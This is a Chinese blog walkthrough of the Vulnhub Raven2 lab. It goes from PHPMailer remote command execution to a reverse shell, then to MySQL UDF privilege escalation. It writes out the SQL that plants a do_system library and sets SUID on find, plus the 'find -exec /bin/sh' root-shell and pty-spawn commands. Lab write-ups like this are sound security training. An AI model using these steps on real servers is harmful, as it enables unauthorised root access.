首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >udf提权学习-Vulnhub/Raven2靶机

udf提权学习-Vulnhub/Raven2靶机

作者头像
MssnHarvey
发布2022-11-14 16:33:13
发布2022-11-14 16:33:13
7590
举报
文章被收录于专栏:HarveyHarvey

先nmap扫一下存活端口

可以发现有22,80,111这几个端口

首先从web下手,dirb扫一下目录可以知道是个wp站点

并且发现/vendor目录存在目录遍历

在/vendor/PATH目录下发现flag1以及其绝对路径

在/vendor/VERSION目录下得知PHPMailer版本号5.2.16

在kali中搜索phpmailer可以发现有个PHPMailer<5.2.18-远程命令执行

修改一下直接打

然后访问shell.php,并设置端口监听

成功反弹shell后找到wp的配置文件,发现数据库的账号密码:root/R@v3nSecurity

并且可以看到mysql服务启动了

nc模式下的shell不支持su交互,我们先生成一个交互式shell

代码语言:javascript
复制
python -c 'import pty;pty.spawn("/bin/bash")'

通过find命令找到flag3图片的路径

成功登入mysql后,可以看到是mysql5.5.60

接着我们尝试使用udf提权,搜一下可以看到一个可利用的

然后我们将1518.c本地编译一下再上传

开启web服务

然后wget传进去1518.so

上传成功后,在靶机上链接mysql数据库并操作

代码语言:javascript
复制
create table foo(line blob);
insert into foo values(load_file('/tmp/1518.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
create function do_system returns integer soname '1518.so';
select * from mysql.func;
select do_system('chmod u+s /usr/bin/find');  

最后提权后得到flag4

代码语言:javascript
复制
touch foo
find foo -exec "whoami" \;
find foo -exec "id" \;
find foo -exec "/bin/sh" \;

前面没找到的flag2在www-data的home目录中

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2022-11-05,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档